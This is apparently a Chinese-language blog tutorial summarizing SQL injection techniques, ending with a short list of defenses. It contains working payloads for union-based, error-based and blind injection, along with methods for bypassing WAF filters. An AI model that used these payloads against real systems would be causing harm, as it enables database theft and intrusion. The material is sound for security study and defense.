sql注入总结

Posted 2022-02-27 三亿人

sql注入

先看几个已经发生的sql注入

 

漏洞原理

　　web应用程序对用户输入数据的合法性没有判断或者过滤不严格，攻击者在程序事先定义好的sql语句结尾添加额外的sql语句，欺骗sql服务器执行非授权的任意查询，得到一些数据。

漏洞危害

　　1. 脱库，通过批量查询的方式获取数据库中有用的信息。

　　2. 查询管理员的账号、密码，从而利用管理员账号密码做更多的操作。

　　3. 对数据增删改查，达到非法的目的。

　　4. 如果有读写权限，也可以直接向服务器写木马文件，读取服务器中敏感文件，进一步进行提权，从而控制整个服务器。

漏洞利用

　　1. union联合查询

　　union用于合并两个或者多个select语句的结果集。通过将原有查询语句结果置为空，页面上就会回显union后的select语句的结果。

联合查询中需要得到原有查询语句的列数，最常用的两种方式

1. 使用order by 
?id=1\' order by 3 --+ 
2. 使用union语句判断列数
?id=1\' union select NULL,NULL,NULL --+
在Oracle中，每个查询语句都必须使用FROM关键字并指定一个有效的表，有一个DUAL表
?id=1\' union select NULL,NULL from DUAL --

 　　使用union查询可利用的sql函数有：

mysql中
@@version   #查询数据库版本
database()  #查当前数据库
user()      #用户
有3个常用的连接字符串函数：
concat(1,2)      #将两个字符串连接在一起
concat_ws(#,1,2)   #不同的字符串用#隔开
group_concat(1,2,3)  #显示在同一行

　　数据库中的默认库或者表

　　mysql中有一个information_schema库，该库中有3张默认表：分别为：

　　SCHEMATA、TABLES、COLUMNS

　　对应的字段名有：SCHEAMTA_NAME；TABLE_SCHEMATA，TABLE_NAME；TABLE_SCHEMATA，TABLE_NAME，COLUMN_NAME；

　　2. 报错注入

　　当页面没有回显信息，但是存在sql的报错语句时，我们就可以尝试使用报错注入，通过一些函数的使用，导致数据库执行出错，返回我们构造的查询语句的结果。

　　常见的报错注入函数：

　　floor():

floor：这个函数需要结合count(),rand(),group by()一起 来利用。

　?name=luy\' or (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2))) --+

 

　　extractvalue()与updatexml：

　　这两个称为xpath报错，都是对xml文档进行查询，updatexml可以进行查询替换。

extractvalue(xml文档，xml路径)  
updataxml(xml文档，xml路径，更新的xml内容)
都是在xml路径中植入我们的查询语句。其他参数的值可以随便写，执行报错会回显我们的查询语句结果。

　?name=jjh\' or extractvalue(1,concat(0x7e,(select database()),0x7e))--+

　?name=jjh\' or updatexml(1,concat(0x3a,(select database()),0x7e),1)--+

　　3. 盲注

　　当页面不回显数据，也没有报错语句，只能通过页面返回的正常与否来判断我们的注入语句是否正确。就需要进行盲注。

　　(1). 时间盲注

　　当我们构造的正确sql语句和错误sql语句，回显都一样时，就考虑用时间盲注，通过页面的返回时间来判断我们构造sql语句的正确与否。

mysql中的延迟时间函数有：sleep(3)

?id=1\' and if(left(database(),1)=\'s\',sleep(3),0)

PostgreSQL的时间函数：pg_sleep(3)

sql server的时间函数：WAITFOR DELAY \'0:0:3\'

Oracle 的时间函数：dbms_pipe.receive_message(\'RDS\', 10)

?id=-1 or 1= dbms_pipe.receive_message(\'RDS\', 10)--

　　(2). 布尔盲注

　　利用一些截取字符串的函数来截取我们查询结果的字符串，从而确定我们查询结果的值是什么。因为我们查询的结果不回显，只能通过猜测来判断返回的值是什么。

left(string,n)   #n为截取的长度
?id=1\' and left(database(),1)=\'p\'
substr(string,start,length)  #start为开始截取的位置，length为截取的长度
?id=1\' and ascii(substr(database(),1,1)=112
regexp正则表达式
?id=1\' and database() regexp \'^p\' #第一个字符是p
like
?id=1\' and database() like \'p%\' #第一个字符是p
if(判断条件，正确返回的值，错误返回的值)

?id=1\' and 1=if(left(database(),1)=\'d\',1,0)

　　4. 宽字节注入

　　后端使用了GBK编码，并且会对单引号，双引号进行转义，我们在构造exp时，需要在闭合字符（单双引号）的前面加上%df ，这样后端对闭合的单双引号转义时，转义的反斜杠会被编码为%5c，%5c与我们写入的%df会组成一个汉字，这样就绕过了对特殊字符的转义，从而正确闭合，执行我们的sql语句。

　　5. 堆叠注入

　　mysql中，通过分号来结束sql语句，这样就可以多条sql语句一起使用，攻击者就可以利用分号来结束原有sql语句，后面构造自己的sql语句，从而造成sql注入。

　　6. Base64注入

　　就是将提交的参数进行了base64编码，攻击者也可以将sql语句构造好之后进行编码，传入参数也能进行sql注入。

　　7. 二次注入

　　第一次往数据库中插入恶意数据，第二次查询插入的恶意数据，就会造成攻击。

漏洞存在位置

　　1. cookie位置

　　web应用程序可能会利用cookie来确定是否是已知用户，

http请求包中含有cookie字段
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
应用程序可能会利用sql查询来确定是否是正常用户。
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = \'u5YD3PapBcR4lN3e7Tj4\'
这时就有可能存在sql注入
exp: \' and \'1\'=\'1

 　　2. 提交的参数位置

　　参数位置的sql注入比较常见，只要提交的参数拼接到sql语句中执行了，就有可能存在sql注入。

绕过方式

 　　1. 编码绕过：

　　waf对单引号，双引号进行了过滤，我们可以将单双引号进行编码，再进行闭合，一次编码不行，也可以考虑二次编码进行绕过。常用的有url编码，unicode编码，base64，hex等。

　　2. 大小写双写关键字绕过：

　　部分waf值过滤全大写或者小写的关键字，我们可以大小写一起使用来绕过。

　　3. 过滤了空格：

　　可以使用+ 、注释符/**/ 、空白符来绕过。

　　4. and和or进行了过滤：

　　可以使用&& 、 || 代替 and 和 or 

　　5. 内联注释绕过：

　　将关键字包裹在多行注释里面，/*!50002sleep(3)*/

　　6. 异常method绕过：

　　有些waf只检测GET、POST方法，我们可以修改请求方式为DigApis，有可能会绕过waf的检测。

　　7. 复参数绕过：

　　在提交的参数中给同一个参数多次赋值，部分waf只会检测第一个参数的值，而后端程序处理时可能取后面参数的值，从而进行绕过。

　　8. 在关键字中添加%绕过：

　　如果对关键字进行检测，我们可以在关键字中添加多个%，绕过waf的检测。

漏洞防御

　　1. 对关键字和特殊符号进行过滤。

　　2. 对sql语句进行预编译，使用户输入的值只当做参数来传入，不会作为sql命令来执行。

　　3. 将用户的输入转义后再组成sql语句。

　　4. 统一错误信息，关闭错误提示。

　　5. 限制用户输入的长度。